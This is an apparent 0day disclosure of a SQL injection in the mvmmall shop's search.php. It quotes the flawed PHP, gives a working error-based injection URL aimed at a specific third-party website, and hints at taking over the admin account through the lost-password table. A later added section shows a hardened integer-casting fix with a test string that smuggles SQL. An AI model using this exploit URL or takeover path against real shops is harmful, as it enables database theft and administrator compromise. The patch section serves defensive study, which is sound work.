mvmmall online shop system: SQL injection vulnerability
The latest injection 0day in the mvmmall online shop system is in the search script, search.php.

The code is as follows:
```php
<?php
require_once 'include/common.inc.php';
require_once ROOTPATH.'header.php';
if($action!='search'){
    $search_key = '';
    if (isset($ps_search))
    { // a lot omitted here
        $tag_ids = array(); // inside the if
        // more omitted
        while ($row = $db->fetch_array($result)) {
            $tag_ids[] = $row['goods_id'];
        } // also inside the if
    }
    // a lot omitted here
} // end of the if body
// goods tag search
$tag_ids = array_unique($tag_ids); // without ps_search it is never initialised! the user can supply it
$tag_search = implode(',',dhtmlchars($tag_ids)); // dhtmlchars only strips HTML tags, ignore it
$tag_search && $tag_search = "OR uid IN($tag_search)"; // phew... done!
// unrelated code omitted
$search_sql = "WHERE upv = '1' AND up_date<='$m_now_time'"." AND (( 1 " . $cat_search . $search_key . $brand_search . $min_search . $max_search ." ) ".$tag_search." )"; // no single quotes...
$total_count = $db->counter($mvm_goods_table,$search_sql);
```
With the ADMIN user and the MALL, then use the lost-password feature: mvm_lostpass stores the verification string, so the password can be changed directly.
Test EXP:

http://www.heimian.com/search.php?tag_ids=uid))%20and(select%201%20from(select%20count(*),concat((select%20(select%20user())%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
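As an added example (not mvmmall's own code), here is a hardened form of the tag-search clause from search.php above. The function build_tag_search() and reading ps_search from $_GET are assumptions made for this example; the fix initialises $tag_ids unconditionally, stops relying on register_globals, and casts every id to an integer before it reaches the SQL string.

```php
<?php
// Added example, not code from the mvmmall project.
// Three changes compared with the vulnerable search.php:
//  1. $tag_ids is initialised before any conditional, so a request
//     parameter can never become its value under register_globals;
//  2. the request is read explicitly from $_GET (assumed here) instead
//     of relying on register_globals at all;
//  3. every id is cast to int, so the IN(...) list can only contain
//     integers. dhtmlchars() is not a substitute for this: it strips
//     HTML tags, which does nothing against SQL syntax.

/**
 * Build the "OR uid IN(...)" fragment from a list of candidate ids.
 * Returns '' when no valid ids remain, which keeps the original
 * "$tag_search && ..." behaviour (no clause when the list is empty).
 */
function build_tag_search(array $tag_ids): string
{
    $ids = array();
    foreach ($tag_ids as $id) {
        // Accept only whole numbers; anything else (for example a
        // string carrying SQL syntax) is dropped rather than quoted.
        if (is_int($id) || (is_string($id) && preg_match('/^\d+$/', $id))) {
            $ids[] = (int) $id;
        }
    }
    $ids = array_unique($ids);
    if (count($ids) === 0) {
        return '';
    }
    return 'OR uid IN(' . implode(',', $ids) . ')';
}

// --- how search.php would use it ---
$tag_ids = array();                  // always initialised (fix 1)
if (isset($_GET['ps_search'])) {     // explicit request access (fix 2)
    // ... original lookup filling $tag_ids from $db->fetch_array() ...
}
$tag_search = build_tag_search($tag_ids); // integer-only list (fix 3)

// Constructed inputs: a normal id list, and a list that smuggles SQL.
echo build_tag_search(array('3', '7', '3')), "\n";
echo build_tag_search(array('uid)) and 1=1#', '7')), "\n";
```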